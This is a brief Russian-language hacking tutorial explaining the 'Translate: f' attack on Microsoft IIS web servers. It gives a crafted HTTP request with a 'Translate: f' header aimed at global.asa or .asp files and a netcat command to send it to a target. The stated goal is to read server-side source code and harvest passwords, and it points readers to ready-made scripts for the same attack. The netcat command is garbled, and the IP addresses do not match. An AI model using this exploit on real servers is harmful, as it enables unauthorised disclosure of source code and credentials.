Атака translate f

[ Хакерство в Интернете ]

Эту атаку можно применять ко всем IIS. Для того чтобы её осуществить нам нужна утилита NetCat и любая прога преобразующая текст в шестнадцатирикный формат.

Создаём файл trans и в нём пишем :

GET /global. asa(Или *.asp) HTTP1.0

Host: 192.168.20.10

User-Agent: SensePostData

Content-Type: application/x-www-form-urlencoded

Translate: f

[CRLF]

[CRLF]

Внимание [CRLF] в шестнадцетиричном формате будет иметь вид 0D0A.

Преобразуем. теперь нужна утилита netcat

#cat trans > nc - nvv 192.168.234.41 80

В ответ мы получем содержание файла global. asa иногда там иожно найти пароли.

Так-же можно использовать сценарии tarans. pl и srcgrab. pl. Найти их можно в любом поисковике.

By Xflint

XFlint